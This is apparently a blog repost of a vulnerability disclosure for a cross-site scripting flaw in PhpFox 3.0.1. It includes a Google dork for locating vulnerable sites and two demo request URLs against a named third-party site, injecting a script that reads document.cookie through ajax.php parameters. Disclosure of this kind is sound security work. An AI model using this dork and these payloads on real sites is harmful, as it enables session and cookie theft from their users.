J2TEAM Security: A must-have extension for Chrome users. Install now!

PhpFox 3.0.1 Cross Site Scripting (XSS)

PhpFox 3.0.1 Cross Site Scripting. Lỗ hổng bảo mật XSS được phát hiện trong phiên bản 3.0.1 của PhpFox
PhpFox 3.0.1 Cross Site Scripting | Juno_okyo's Blog


Google Dork: Intext:"Powered By phpFox Version 3.0.1"

Vendor Home : http://www.phpfox.com/

There are lots of parametrs Vulnerable to xss in ajax.php file like feed_id & message & title &...

Demo


http://www.didarmasumane.tk//static/ajax.php?comment_type_id=feed&core[ajax]=true&core[call]=comment.viewMoreFeed&core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=25&core[security_token]=1fa4d24158b81e721c5974d7f175b2ac&feed_id="><script>alert(document.cookie);</script>&item_id=518&_=1346525603467

http://www.didarmasumane.tk//static/ajax.php?comment_type_id=feed&core[ajax]=true&core[call]=comment.viewMoreFeed&core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=25&core[security_token]=1fa4d24158b81e721c5974d7f175b2ac&feed_id=id&item_id=518"><script>alert(document.cookie);</script>&_=1346525603467
Leader at J2TEAM. Website: https://j2team.dev/